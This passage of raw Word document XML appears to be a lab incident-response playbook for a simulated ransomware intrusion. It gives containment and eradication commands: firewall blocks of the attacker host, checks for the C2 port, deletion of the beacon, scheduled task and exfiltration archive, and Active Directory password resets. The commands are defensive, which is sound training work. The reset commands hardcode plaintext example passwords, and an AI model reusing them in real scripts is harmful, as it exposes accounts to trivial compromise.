          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>— confirm Wazuh agents are still reporting and no tampering has occurred on the SIEM pipeline.</w:t>
      </w:r>
    </w:p>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3.3  Containment Commands (Executed on WAZUH01)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="30" w:type="dxa"/>
          <w:start w:w="200" w:type="dxa"/>
          <w:bottom w:w="30" w:type="dxa"/>
          <w:end w:w="200" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>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 CONTAINMENT VERIFICATION COMMANDS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Confirm WS-EMP01 is unreachable (expect: Request timeout)</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ping -c 3 10.10.10.12</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Verify C2 connection is broken from SIEM perspective</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netstat -an | grep ':4444'          # Expected: no ESTABLISHED entries</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Block ATTACK01 at firewall level (both directions)</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sudo iptables -A INPUT  -s 10.10.10.40 -j DROP</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sudo iptables -A OUTPUT -d 10.10.10.40 -j DROP</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sudo iptables -L --line-numbers     # Verify rules are active</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Check WAZUH01 connectivity to remaining agents</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sudo /var/ossec/bin/agent_control -l  # Expect: DC01 Active, FS01 Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>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C0392B"/>
              <w:start w:val="single" w:sz="16" w:space="0" w:color="C0392B"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0392B"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="C0392B"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="FADBD8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="922B21"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DO NOT reimage or wipe WS-EMP01 before forensic evidence collection is complete. Reimaging destroys volatile memory, running processes, registry persistence keys, and prefetch artefacts essential for building the complete attack timeline. Evidence collection precedes eradication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:start w:w="160" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:end w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="7960"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="1B3A5C" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pageBreakBefore/>
              <w:widowControl/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:color w:themeColor="light1" w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:themeColor="accent1" w:themeTint="fd" w:val="DCE6F2"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="accent1">
                      <w14:lumMod w14:val="20000"/>
                      <w14:lumOff w14:val="80000"/>
                    </w14:schemeClr>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>PHASE 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7960" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="1F5C99" w:val="clear"/>
            <w:tcMar>
              <w:start w:w="200" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:widowControl/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="240" w:after="80"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:color w:themeColor="light1" w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="7" w:name="_Toc16888"/>
            <w:r>
              <w:rPr>
                <w:color w:themeColor="light1" w:val="FFFFFF"/>
                <w:kern w:val="0"/>
              </w:rPr>
              <w:t>ERADICATION</w:t>
            </w:r>
            <w:bookmarkEnd w:id="7"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>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D4AC0D"/>
              <w:start w:val="single" w:sz="12" w:space="0" w:color="D4AC0D"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="D4AC0D"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="D4AC0D"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="FEF9E7" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase Goal: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="5D4037"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Remove every attacker artefact from the environment. Eradication extends beyond deleting payload files — it encompasses removing all persistence mechanisms, revoking stolen credentials, closing attack vectors, and independently verifying each step.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4.1  WS-EMP01 Eradication Checklist</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1646"/>
        <w:gridCol w:w="5229"/>
        <w:gridCol w:w="1583"/>
        <w:gridCol w:w="902"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1646"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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5229"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Command / Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1583"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Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="902"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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="164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Terminate malicious process (Sliver beacon)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="522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taskkill /IM invoice_Q3.exe /F</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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tasklist — process absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="90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164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Delete scheduled task persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="522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schtasks /delete /tn 'WindowsUpdateHelper' /f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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schtasks /query — task absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="90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164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Remove payload from disk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="522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del C:\Users\Public\invoice_Q3.exe /f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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dir — file absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="90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164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Remove RansomSimLab directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="522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Remove-Item C:\RansomSimLab -Recurse -Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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dir — directory absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="90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164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Audit Run/RunOnce registry keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="522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HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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 malicious entries found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="90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164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Run Atomic Red Team cleanup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="522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Invoke-AtomicTest T1204.002 -Cleanup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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ART cleanup: exit code 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="90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164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Verify no residual network connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="522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netstat -an | findstr 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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 ESTABLISHED entries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="90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bl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4.2  FS01 Eradication Checklist</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2399"/>
        <w:gridCol w:w="3000"/>
        <w:gridCol w:w="2600"/>
        <w:gridCol w:w="1361"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399"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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300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Command / Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="260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Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1361"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Status</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Remove data staging directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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Remove-Item 'C:\Windows\Temp\stage' -Recurse -Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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dir — directory absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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Remove exfiltration archive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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Remove-Item 'C:\Windows\Temp\exfil.zip' -Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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dir — file absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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Audit share access logs (EID 4663)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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data.win.system.eventID: 4663 filter for FS01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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All accessed files identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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Verify no attacker-created scheduled tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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schtasks /query — review all entries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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 rogue tasks found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="136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Confirm cscript.exe OSTap artefacts removed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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Search C:\Users\Public\, C:\Windows\Temp\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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 OSTap files (art.jse, OSTapGet.js)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="136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Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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4.3  Active Directory Credential Eradication</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="30" w:type="dxa"/>
          <w:start w:w="200" w:type="dxa"/>
          <w:bottom w:w="30" w:type="dxa"/>
          <w:end w:w="200" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>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 DC01: CREDENTIAL ERADICATION (PowerShell — Domain Admin)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Reset Domain Administrator password (invalidates all existing NTLM hashes)</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Set-ADAccountPassword -Identity Administrator -Reset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r>
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E0E0E0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>-NewPassword (ConvertTo-SecureString 'NewStr0ngP@ss2026!' -AsPlainText -Force)</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Reset compromised user emp01 password</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Set-ADAccountPassword -Identity emp01 -Reset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r>
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E0E0E0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>-NewPassword (ConvertTo-SecureString 'EmpN3wS3cur3!2026' -AsPlainText -Force)</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Re-enable emp01 account after password reset</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Enable-ADAccount -Identity emp01</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Purge all Kerberos tickets across domain (forces re-auth with new credentials)</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Invoke-Command -ComputerName DC01,FS01,WS-EMP01 -ScriptBlock { klist purge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7EC8E3"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t># Verify no rogue accounts created during attack window</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Get-ADUser -Filter * -Properties WhenCreated |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r>
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E0E0E0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Where-Object { $_.WhenCreated -gt (Get-Date).AddDays(-7) } | \</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="1E2030" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E0E0E0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E0E0E0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Select-Object Name, SamAccountName, WhenCreated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:start w:w="160" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:end w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="7960"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="1B3A5C" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pageBreakBefore/>
              <w:widowControl/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:color w:themeColor="accent1" w:val="4F81BD"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:themeColor="accent1" w:themeTint="fd" w:val="DCE6F2"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="accent1">
                      <w14:lumMod w14:val="20000"/>
                      <w14:lumOff w14:val="80000"/>
                    </w14:schemeClr>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>PHASE 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7960" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="1F5C99" w:val="clear"/>
            <w:tcMar>
              <w:start w:w="200" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:widowControl/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="240" w:after="80"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:color w:themeColor="accent1" w:val="4F81BD"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="8" w:name="_Toc22660"/>
            <w:r>
              <w:rPr>
                <w:color w:themeColor="light1" w:val="FFFFFF"/>
                <w:kern w:val="0"/>
              </w:rPr>
              <w:t>RECOVERY</w:t>
            </w:r>
            <w:bookmarkEnd w:id="8"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>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D4AC0D"/>
              <w:start w:val="single" w:sz="12" w:space="0" w:color="D4AC0D"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="D4AC0D"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="D4AC0D"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="FEF9E7" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase Goal: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="5D4037"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
